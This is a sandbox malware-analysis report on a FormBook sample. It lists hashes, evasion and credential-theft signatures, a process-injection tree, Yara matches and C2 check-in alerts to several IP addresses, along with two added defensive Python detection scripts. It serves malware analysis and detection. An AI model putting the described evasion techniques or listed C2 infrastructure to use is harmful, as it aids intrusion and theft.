
Windows Analysis Report
ofZiNLLKZU.exe

Overview

General Information

Sample name: ofZiNLLKZU.exe (renamed because the original name is a hash value)
Original sample name: eeeaa1d7c634e0cc3f1550e756208a118f28be191b374ba6a2e3690f89949751.exe
Analysis ID: 1587873
MD5: 68056372ed7e2ab369235bf4c2e9cfb5
SHA1: d75a067e94a4da806d391ea85892cc9608e6f455
SHA256: eeeaa1d7c634e0cc3f1550e756208a118f28be191b374ba6a2e3690f89949751
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ofZiNLLKZU.exe (PID: 7760 cmdline: "C:\Users\user\Desktop\ofZiNLLKZU.exe" MD5: 68056372ED7E2AB369235BF4C2E9CFB5)
    • svchost.exe (PID: 7840 cmdline: "C:\Users\user\Desktop\ofZiNLLKZU.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • kwRriiLHUBrBci.exe (PID: 1460 cmdline: "C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TCPSVCS.EXE (PID: 8056 cmdline: "C:\Windows\SysWOW64\TCPSVCS.EXE" MD5: 73905DB831B4F37F0673D2DD5BBF7779)
          • kwRriiLHUBrBci.exe (PID: 5180 cmdline: "C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7404 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
No configs have been found
Yara matches on memory dumps

Source                                                                                  Rule                    Description             Author
00000005.00000002.3900696034.0000000002600000.00000004.00000800.00020000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
00000005.00000002.3900973185.0000000002790000.00000004.00000800.00020000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
00000002.00000002.1724553623.0000000000400000.00000040.80000000.00040000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
00000002.00000002.1724963912.0000000003790000.00000040.10000000.00040000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
00000006.00000002.3905770259.0000000004F80000.00000040.80000000.00040000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
(3 further memory-dump matches are collapsed in the report; all eight are listed under AV Detection.)

Yara matches on unpacked PEs

Source                               Rule                    Description             Author
2.2.svchost.exe.400000.0.unpack      JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
2.2.svchost.exe.400000.0.raw.unpack  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security

                System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\ofZiNLLKZU.exe", CommandLine: "C:\Users\user\Desktop\ofZiNLLKZU.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ofZiNLLKZU.exe", ParentImage: C:\Users\user\Desktop\ofZiNLLKZU.exe, ParentProcessId: 7760, ParentProcessName: ofZiNLLKZU.exe, ProcessCommandLine: "C:\Users\user\Desktop\ofZiNLLKZU.exe", ProcessId: 7840, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\ofZiNLLKZU.exe", CommandLine: "C:\Users\user\Desktop\ofZiNLLKZU.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ofZiNLLKZU.exe", ParentImage: C:\Users\user\Desktop\ofZiNLLKZU.exe, ParentProcessId: 7760, ParentProcessName: ofZiNLLKZU.exe, ProcessCommandLine: "C:\Users\user\Desktop\ofZiNLLKZU.exe", ProcessId: 7840, ProcessName: svchost.exe
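The Sigma hit above and the process tree in the Classification section show the two things a detection engineer would key on: svchost.exe (PID 7840) was started by the sample rather than by services.exe, and its command line still reads "C:\Users\user\Desktop\ofZiNLLKZU.exe" because the sample created itself suspended and swapped the image (the "Creates a process in suspended mode" and "Writes to foreign memory regions" signatures). Note also that kwRriiLHUBrBci.exe is not a dropped payload: its PDB path (R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb, listed under AV Detection) identifies it as the sandbox's fake Chrome, which FormBook injects into as it would a real browser, and firefox.exe is the sandbox-launched browser it targets next. The script below is an added example, not part of the Joe Sandbox report: it runs both checks over constructed Sysmon-style events built from the PIDs and paths on this page. The allow-list of legitimate svchost.exe parents and the parent of PID 7760 (explorer.exe, PID 4321) are assumptions.

```python
"""Detection logic for the two process-tree anomalies this report surfaces.

Checks run over Sysmon-style process-creation events:
  1. svchost.exe whose parent is not one of its normal launchers (the logic
     behind the Sigma hit "Uncommon Svchost Parent Process").
  2. The executable named on the command line is not the image that was
     mapped. A hollowed process keeps the command line of the binary passed
     to CreateProcess, so svchost.exe PID 7840 still carries the path of
     ofZiNLLKZU.exe.
Constructed input: PIDs and paths come from the report, the parent of PID
7760 is assumed.
"""
import ntpath
import shlex
from dataclasses import dataclass

# Assumed allow-list of parents that legitimately start svchost.exe; the
# Sigma rule's own filter list is not reproduced on the report page.
LEGIT_SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe", "svchost.exe", "ngen.exe"}


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    image: str          # full path of the executable actually mapped
    command_line: str   # command line as recorded by the OS
    parent_pid: int
    parent_image: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, with surrounding quotes stripped."""
    return ntpath.basename(path.strip('"')).lower()


def cmdline_image(command_line: str) -> str:
    """Basename of argv[0] in a Windows command line (quotes and backslashes kept literal)."""
    try:
        argv = shlex.split(command_line, posix=False)
    except ValueError:
        argv = command_line.split()
    return basename(argv[0]) if argv else ""


def uncommon_svchost_parent(ev: ProcessEvent) -> bool:
    return basename(ev.image) == "svchost.exe" and basename(ev.parent_image) not in LEGIT_SVCHOST_PARENTS


def image_cmdline_mismatch(ev: ProcessEvent) -> bool:
    """True when the command line claims a different executable than the mapped image."""
    claimed = cmdline_image(ev.command_line)
    return bool(claimed) and claimed != basename(ev.image)


def analyse(events):
    """Return {pid: [reasons]} for every event that trips at least one check."""
    findings = {}
    for ev in events:
        reasons = []
        if uncommon_svchost_parent(ev):
            reasons.append(f"svchost.exe started by {basename(ev.parent_image)} (pid {ev.parent_pid})")
        if image_cmdline_mismatch(ev):
            reasons.append(f"command line names {cmdline_image(ev.command_line)} but image is {basename(ev.image)}")
        if reasons:
            findings[ev.pid] = reasons
    return findings


FAKE_DIR = r"C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF"
SAMPLE_EVENTS = [
    # the sample's own parent is not on the page: explorer.exe / pid 4321 is assumed
    ProcessEvent(7760, r"C:\Users\user\Desktop\ofZiNLLKZU.exe", r'"C:\Users\user\Desktop\ofZiNLLKZU.exe"', 4321, r"C:\Windows\explorer.exe"),
    ProcessEvent(7840, r"C:\Windows\SysWOW64\svchost.exe", r'"C:\Users\user\Desktop\ofZiNLLKZU.exe"', 7760, r"C:\Users\user\Desktop\ofZiNLLKZU.exe"),
    ProcessEvent(1460, FAKE_DIR + r"\kwRriiLHUBrBci.exe", f'"{FAKE_DIR}\\kwRriiLHUBrBci.exe"', 7840, r"C:\Windows\SysWOW64\svchost.exe"),
    ProcessEvent(8056, r"C:\Windows\SysWOW64\TCPSVCS.EXE", r'"C:\Windows\SysWOW64\TCPSVCS.EXE"', 1460, FAKE_DIR + r"\kwRriiLHUBrBci.exe"),
    # benign control: a service host started by services.exe under its own command line
    ProcessEvent(900, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe -k netsvcs -p", 700, r"C:\Windows\System32\services.exe"),
]

if __name__ == "__main__":
    for pid, reasons in analyse(SAMPLE_EVENTS).items():
        print(pid, "; ".join(reasons))
```

Only PID 7840 is reported, on both counts; the later TCPSVCS.EXE and kwRriiLHUBrBci.exe launches look clean to these two checks even though the Yara hits show FormBook code inside them, which is why the memory-dump matches rather than process-creation telemetry are what ties the rest of the tree to the infection.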
Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP  Destination Port  Protocol
2025-01-10T18:54:13.696505+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49711        104.21.28.65    80                TCP
2025-01-10T18:54:16.410603+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49712        104.21.28.65    80                TCP
2025-01-10T18:54:18.902834+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49713        104.21.28.65    80                TCP
2025-01-10T18:54:28.889425+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49715        172.67.138.138  80                TCP
2025-01-10T18:54:31.436376+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49718        172.67.138.138  80                TCP
2025-01-10T18:54:33.983258+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49719        172.67.138.138  80                TCP
2025-01-10T18:55:20.841779+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49721        69.57.163.64    80                TCP
2025-01-10T18:55:23.389513+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49722        69.57.163.64    80                TCP
2025-01-10T18:55:25.919332+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49723        69.57.163.64    80                TCP
2025-01-10T18:55:35.244239+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49725        101.32.205.61   80                TCP
2025-01-10T18:55:37.684101+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49726        101.32.205.61   80                TCP
2025-01-10T18:55:40.303895+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49727        101.32.205.61   80                TCP
2025-01-10T18:55:50.108422+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49729        103.159.36.66   80                TCP
2025-01-10T18:55:52.655340+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49730        103.159.36.66   80                TCP
2025-01-10T18:55:55.202255+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49731        103.159.36.66   80                TCP
2025-01-10T18:56:03.712870+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49733        103.168.172.37  80                TCP
2025-01-10T18:56:07.234547+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49734        103.168.172.37  80                TCP
2025-01-10T18:56:08.851280+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49735        103.168.172.37  80                TCP
2025-01-10T18:56:17.936704+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49737        188.114.96.3    80                TCP
2025-01-10T18:56:20.484198+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49738        188.114.96.3    80                TCP
2025-01-10T18:56:23.030524+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49739        188.114.96.3    80                TCP
2025-01-10T18:57:09.179374+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49741        84.32.84.32     80                TCP
2025-01-10T18:57:11.524565+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49742        84.32.84.32     80                TCP
2025-01-10T18:57:14.240369+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49743        84.32.84.32     80                TCP
2025-01-10T18:57:23.090653+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49745        208.91.197.27   80                TCP
2025-01-10T18:57:25.707410+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49746        208.91.197.27   80                TCP
2025-01-10T18:57:28.193400+0100  2855464  1         A Network Trojan was detected  192.168.2.8  49747        208.91.197.27   80                TCP
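The alert table has a shape worth measuring rather than eyeballing: the same SID fires three times per destination, the three hits are about 2.5 seconds apart, and then the sample moves on to a new host after a pause of roughly 9 seconds or more. That is consistent with FormBook walking its configured list of candidate domains (most of them decoys) and giving each a few check-in attempts. The script below is an added example, not part of the report; its input is the table above retyped with "|" between the columns the page runs together, and the 5-second retry window used to separate "retries to one host" from "move to the next host" is an assumed threshold.

```python
"""Cadence analysis of the Suricata alerts in this report's table.

Groups the 27 hits on SID 2855464 by destination, measures how the sample
retries each C2 candidate, and how long it pauses before the next one.
ALERTS is the report's table retyped with '|' between columns (constructed
input, not a file the report provides).
"""
from collections import defaultdict
from datetime import datetime

ALERTS = """\
2025-01-10T18:54:13.696505+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49711|104.21.28.65|80|TCP
2025-01-10T18:54:16.410603+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49712|104.21.28.65|80|TCP
2025-01-10T18:54:18.902834+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49713|104.21.28.65|80|TCP
2025-01-10T18:54:28.889425+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49715|172.67.138.138|80|TCP
2025-01-10T18:54:31.436376+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49718|172.67.138.138|80|TCP
2025-01-10T18:54:33.983258+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49719|172.67.138.138|80|TCP
2025-01-10T18:55:20.841779+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49721|69.57.163.64|80|TCP
2025-01-10T18:55:23.389513+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49722|69.57.163.64|80|TCP
2025-01-10T18:55:25.919332+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49723|69.57.163.64|80|TCP
2025-01-10T18:55:35.244239+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49725|101.32.205.61|80|TCP
2025-01-10T18:55:37.684101+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49726|101.32.205.61|80|TCP
2025-01-10T18:55:40.303895+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49727|101.32.205.61|80|TCP
2025-01-10T18:55:50.108422+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49729|103.159.36.66|80|TCP
2025-01-10T18:55:52.655340+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49730|103.159.36.66|80|TCP
2025-01-10T18:55:55.202255+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49731|103.159.36.66|80|TCP
2025-01-10T18:56:03.712870+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49733|103.168.172.37|80|TCP
2025-01-10T18:56:07.234547+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49734|103.168.172.37|80|TCP
2025-01-10T18:56:08.851280+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49735|103.168.172.37|80|TCP
2025-01-10T18:56:17.936704+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49737|188.114.96.3|80|TCP
2025-01-10T18:56:20.484198+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49738|188.114.96.3|80|TCP
2025-01-10T18:56:23.030524+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49739|188.114.96.3|80|TCP
2025-01-10T18:57:09.179374+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49741|84.32.84.32|80|TCP
2025-01-10T18:57:11.524565+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49742|84.32.84.32|80|TCP
2025-01-10T18:57:14.240369+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49743|84.32.84.32|80|TCP
2025-01-10T18:57:23.090653+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49745|208.91.197.27|80|TCP
2025-01-10T18:57:25.707410+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49746|208.91.197.27|80|TCP
2025-01-10T18:57:28.193400+0100|2855464|1|A Network Trojan was detected|192.168.2.8|49747|208.91.197.27|80|TCP
"""


def parse_alerts(text):
    """Parse the '|'-separated rows into dicts, sorted by timestamp."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sev, cls, src, sport, dst, dport, proto = line.split("|")
        rows.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid), "severity": int(sev), "classtype": cls,
            "src": src, "sport": int(sport), "dst": dst, "dport": int(dport), "proto": proto,
        })
    return sorted(rows, key=lambda r: r["ts"])


def clusters_by_destination(rows):
    """One cluster per destination, in order of first contact, with the spacing of its retries."""
    stamps = defaultdict(list)
    for r in rows:
        stamps[r["dst"]].append(r["ts"])
    clusters = []
    for dst, ts in stamps.items():
        gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
        clusters.append({"dst": dst, "first": ts[0], "last": ts[-1], "attempts": len(ts), "retry_gaps": gaps})
    return clusters


def summarise(rows, retry_window=5.0):
    """Retry cadence per host and pause between hosts; retry_window is an assumed threshold."""
    clusters = clusters_by_destination(rows)
    pauses = [(n["first"] - p["last"]).total_seconds() for p, n in zip(clusters, clusters[1:])]
    retry_gaps = [g for c in clusters for g in c["retry_gaps"]]
    return {
        "sids": sorted({r["sid"] for r in rows}),
        "destinations": [c["dst"] for c in clusters],
        "attempts_per_destination": [c["attempts"] for c in clusters],
        "max_retry_gap_s": max(retry_gaps),
        "min_pause_between_hosts_s": min(pauses),
        # quick retries to one host, a clear pause, then the next host: a sequential domain walk
        "sequential_host_walk": max(retry_gaps) < retry_window < min(pauses),
    }


if __name__ == "__main__":
    for key, value in summarise(parse_alerts(ALERTS)).items():
        print(f"{key}: {value}")
```

On this table the result is nine destinations, three attempts each, a longest retry gap of about 3.5 s and a shortest inter-host pause of about 8.5 s, so the sequential-walk flag is set. The same grouping applied to proxy or firewall logs separates a beaconing host that rotates through many C2 candidates from a host that hammers a single server.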


                AV Detection

Source: ofZiNLLKZU.exe; ReversingLabs: Detection: 71%
Source: ofZiNLLKZU.exe; Virustotal: Detection: 63%
Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.3900696034.0000000002600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3900973185.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1724553623.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1724963912.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3905770259.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1725326786.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3900101760.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.3902676049.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: ofZiNLLKZU.exe; Joe Sandbox ML: detected
Source: ofZiNLLKZU.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kwRriiLHUBrBci.exe, 00000004.00000000.1649615978.0000000000BAE000.00000002.00000001.01000000.00000005.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3901520973.0000000000BAE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: tcpsvcs.pdb source: svchost.exe, 00000002.00000002.1724812110.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1724832326.0000000003419000.00000004.00000020.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000004.00000002.3901858595.00000000011F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: ofZiNLLKZU.exe, 00000000.00000003.1469038051.00000000043D0000.00000004.00001000.00020000.00000000.sdmp, ofZiNLLKZU.exe, 00000000.00000003.1469321830.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1725013756.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1631822493.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1725013756.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1634122122.0000000003800000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1733003982.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1735628342.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3903783191.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3903783191.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ofZiNLLKZU.exe, 00000000.00000003.1469038051.00000000043D0000.00000004.00001000.00020000.00000000.sdmp, ofZiNLLKZU.exe, 00000000.00000003.1469321830.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1725013756.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1631822493.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1725013756.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1634122122.0000000003800000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, TCPSVCS.EXE, 00000005.00000003.1733003982.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1735628342.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3903783191.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3903783191.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tcpsvcs.pdbGCTL source: svchost.exe, 00000002.00000002.1724812110.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1724832326.0000000003419000.00000004.00000020.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000004.00000002.3901858595.00000000011F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: TCPSVCS.EXE, 00000005.00000002.3904938820.00000000033BC000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3901472005.000000000293D000.00000004.00000020.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2061663725.00000000061EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: TCPSVCS.EXE, 00000005.00000002.3904938820.00000000033BC000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3901472005.000000000293D000.00000004.00000020.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2061663725.00000000061EC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\ofZiNLLKZU.exe; Code function: 0_2_0063DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\ofZiNLLKZU.exe; Code function: 0_2_0060C2A2 FindFirstFileExW
Source: C:\Users\user\Desktop\ofZiNLLKZU.exe; Code function: 0_2_006468EE FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\ofZiNLLKZU.exe; Code function: 0_2_0064698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\ofZiNLLKZU.exe; Code function: 0_2_0063D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\ofZiNLLKZU.exe; Code function: 0_2_0063D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\ofZiNLLKZU.exe; Code function: 0_2_00649642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\ofZiNLLKZU.exe; Code function: 0_2_0064979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\ofZiNLLKZU.exe; Code function: 0_2_00649B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\ofZiNLLKZU.exe; Code function: 0_2_00645C97 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\TCPSVCS.EXE; Code function: 5_2_0014C4E0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\TCPSVCS.EXE; Code function: 4x nop then xor eax, eax (5_2_00139E40)
Source: C:\Windows\SysWOW64\TCPSVCS.EXE; Code function: 4x nop then pop edi (5_2_0013E0F4)
Source: C:\Windows\SysWOW64\TCPSVCS.EXE; Code function: 4x nop then mov ebx, 00000004h (5_2_02A30528)

                Networking

Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49711 -> 104.21.28.65:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49712 -> 104.21.28.65:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49713 -> 104.21.28.65:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49715 -> 172.67.138.138:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49718 -> 172.67.138.138:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49719 -> 172.67.138.138:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49721 -> 69.57.163.64:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49722 -> 69.57.163.64:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49723 -> 69.57.163.64:80
